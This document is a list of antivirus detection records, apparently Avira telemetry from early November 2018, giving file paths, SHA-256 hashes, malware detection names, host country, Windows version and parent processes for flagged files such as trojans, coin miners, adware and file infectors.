  Row(detection=Row(filename='avscan-20181102-053342-d4a45358', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053342-D4A45358', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052257-544a8722', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052257-544A8722', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051245-e734737d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051245-E734737D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050515-db1b4847', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050515-DB1B4847', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054326-30ca2440', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054326-30CA2440', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060932-d611d07c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060932-D611D07C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051321-fceddcbe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051321-FCEDDCBE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055724-24434ee8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055724-24434EE8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053424-ed5527c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053424-ED5527C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054807-d7bf2473', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054807-D7BF2473', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-154727-6b4f573e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154727-6B4F573E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bak.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\komp03\\BAK\\BAK.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:41:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k secsvcs', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:22:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8255700\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Bit94B0.tmp.exe', parentsize=2690240, timestamp='2018-11-01T10:50:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152152-74663961', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_787b8ae0\\AVSCAN-20181101-152135-71E4C518\\AVSCAN-20181101-152152-74663961', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:22:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154945-82b28a04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154945-82B28A04', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155429-3472c513', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155429-3472C513', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4414197\\MNNStubSetup.VIR', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-01T13:40:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:20:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155725-d028c900', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155725-D028C900', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:42:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160259-08638aac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160259-08638AAC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2a06ec50ce8b4c2ee05dd4f75399b53b29d2dc9e615390f66f4c44ea61e11bff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2A06EC50CE8B4C2EE05DD4F75399B53B29D2DC9E615390F66F4C44EA61E11BFF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a06ec50ce8b4c2ee05dd4f75399b53b29d2dc9e615390f66f4c44ea61e11bff', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:25:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155222-9d10cd24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155222-9D10CD24', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='23versi english.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\versi English\\NC 23versi English\\23versi English.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videoconvert-ttab02-a74bec0684c08ff3beb5e8ebd351d67c.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181026-Tooltab\\VideoConvert-TTAB02-A74BEC0684C08FF3BEB5E8EBD351D67C.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T04:39:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155136-9543ba11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155136-9543BA11', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sop.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\SOP\\SOP.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apar.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\APAR\\APAR.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh8605', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH8605', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:41:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:44:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235054-9980c510', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09479a50\\AVSCAN-20181101-232059-A9CB4FEB\\AVSCAN-20181101-235054-9980C510', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='b1bbffbe641df1b785b36a08b3098eff6e8615d77fefa8f1e9559a483cf29d9c', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:50:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delegate_execute.exe', filepath='C:\\Users\\X\\AppData\\Local\\Maelstrom\\Application\\44.0.1.3\\delegate_execute.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='bc2516bca803dd187b4c8831aea92d938a8a3d7122e4f436e42f6ff3f5561c55', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:H5FO5tPPfE+TdrdY.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T07:41:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='regfix.exe', filepath='\\\\?\\G:\\Game_Coll\\السمكة الجديدة\\REGFIX.EXE', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='6bfcf33539ad802110a3039a51dfa9651f63b0345c56694417737c2bc22cdaef', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:28:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:38:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-br-free-2012g.exe', filepath='G:\\Install\\Daten sichern + retten\\Paragon Backup & Recovery Free Advanced\\Downloader-fuer-br-free-2012g.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='bc7bb743f15d54c4eddda83ae49fbc06ae0e0b0851f35435b24473496fd30668', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:48:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Ozy\\RESTORED\\2018-04-08_14-15-30\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T20:42:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141339-f27baa6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141339-F27BAA6A', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:13:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-063732-feeab14b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88b84a21\\AVSCAN-20181101-055743-1315B9BD\\AVSCAN-20181101-063732-FEEAB14B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110404-c6581b60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110404-C6581B60', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d678174792b1514bcc475cce8f7a9c2c7f582b52d0d99415fbd02d1c0539d5d5.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\D678174792B1514BCC475CCE8F7A9C2C7F582B52D0D99415FBD02D1C0539D5D5.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d678174792b1514bcc475cce8f7a9c2c7f582b52d0d99415fbd02d1c0539d5d5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:12:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205308-b4c99469', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9ce0085\\AVSCAN-20181101-204025-192A484D\\AVSCAN-20181101-205308-B4C99469', filesize=212000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b5b35aa3b3316c8e6f67adf04d761618c33bbc9a5d0d26bee755891d03201556', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:53:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e5d8d1a9160e02fb53037ef3024f7cf75c43b62a5dccac6b64a242b8e2c4b790', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E5D8D1A9160E02FB53037EF3024F7CF75C43B62A5DCCAC6B64A242B8E2C4B790', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e5d8d1a9160e02fb53037ef3024f7cf75c43b62a5dccac6b64a242b8e2c4b790', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:47:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dac8c3e6135108f0daff19a1f742b877be0a4b98', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\dac8c3e6135108f0daff19a1f742b877be0a4b98', filesize=1984000, name='W32/Virut.Gen.#M1.#R1'), hash='85b4989a33a7e51e1edede143265822ecf0b08e7ad4b65b94d8a80d61806d50c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:50:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nseA479.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T14:55:08Z'), dt=datetime.date(2018, 11, 1)),
